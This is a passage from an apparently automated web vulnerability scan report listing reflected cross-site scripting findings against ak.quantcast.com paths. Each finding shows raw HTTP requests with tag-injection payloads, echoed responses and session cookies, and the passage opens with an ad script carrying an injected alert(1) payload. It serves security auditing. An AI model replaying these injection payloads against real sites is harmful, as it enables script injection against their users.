<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?95cdf"-alert(1)-"14e796c9f61=1&Z=728x90&s=1333214&_salt=2292189709";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

1.52. http://ak.quantcast.com/audience [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/audience

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7630d"><a>c9935c12d0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /audience7630d"><a>c9935c12d0b HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:07 GMT
Connection: close
Content-Length: 7781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" audience7630d"><a>c9935c12d0b" />
...[SNIP]...

1.53. http://ak.quantcast.com/audience [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/audience

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71388<a>b46c5412369 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /audience71388<a>b46c5412369 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:09 GMT
Connection: close
Content-Length: 7774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> audience71388<a>b46c5412369</em>
...[SNIP]...

1.54. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57068<a>f8700805bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css57068<a>f8700805bb6/screen-optimized.css?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:45 GMT
Connection: close
Content-Length: 7847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> dynamic-css57068<a>f8700805bb6 screen-optimized.css</em>
...[SNIP]...

1.55. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b45a"><a>9801d42bfe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css8b45a"><a>9801d42bfe9/screen-optimized.css?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:44 GMT
Connection: close
Content-Length: 7851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css8b45a"><a>9801d42bfe9 screen-optimized.css" />
...[SNIP]...

1.56. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf50"><a>f1a4d1b9286 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css6cf50"><a>f1a4d1b9286?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:47 GMT
Connection: close
Content-Length: 7853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.css6cf50"><a>f1a4d1b9286" />
...[SNIP]...

1.57. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53f09<a>66505b41805 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css53f09<a>66505b41805?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:48 GMT
Connection: close
Content-Length: 7847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> dynamic-css screen-optimized.css53f09<a>66505b41805</em>
...[SNIP]...

1.58. http://ak.quantcast.com/images/sprite.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/images/sprite.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca33"><a>2a8c008fa40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imageseca33"><a>2a8c008fa40/sprite.png?v=20110211 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.4.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:45 GMT
Connection: close
Content-Length: 7808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" imageseca33"><a>2a8c008fa40 sprite.png" />
...[SNIP]...

1.59. http://ak.quantcast.com/images/sprite.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/images/sprite.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9064e<a>8b5ec67adeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images9064e<a>8b5ec67adeb/sprite.png?v=20110211 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.4.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:46 GMT
Connection: close
Content-Length: 7802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> images9064e<a>8b5ec67adeb sprite.png</em>
...[SNIP]...

1.60. http://ak.quantcast.com/images/sprite.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32893"><a>9cbcca5d899 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite.png32893"><a>9cbcca5d899?v=20110211 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.4.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:48 GMT
Connection: close
Content-Length: 16558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" images sprite.png32893"><a>9cbcca5d899" />
...[SNIP]...

1.61. http://ak.quantcast.com/js/concat.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 322f9"><a>39035941793 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js322f9"><a>39035941793/concat.js?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:44 GMT
Connection: close
Content-Length: 7790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js322f9"><a>39035941793 concat.js" />
...[SNIP]...

1.62. http://ak.quantcast.com/js/concat.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e48d<a>60dc541b6a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js6e48d<a>60dc541b6a1/concat.js?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:46 GMT
Connection: close
Content-Length: 7786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> js6e48d<a>60dc541b6a1 concat.js</em>
...[SNIP]...

1.63. http://ak.quantcast.com/js/concat.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cb8"><a>08e1fbdf411 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.jsd8cb8"><a>08e1fbdf411?v=2011021105 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.2.10.1297448109; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:47 GMT
Connection: close
Content-Length: 15280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.jsd8cb8"><a>08e1fbdf411" />
...[SNIP]...

1.64. http://ak.quantcast.com/learning-center/case-studies/study/financial1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/learning-center/case-studies/study/financial1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf22"><a>2129f6f3b4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learning-center5bf22"><a>2129f6f3b4e/case-studies/study/financial1/ HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/audience
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.1.10.1297448109

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:25 GMT
Connection: close
Content-Length: 17658

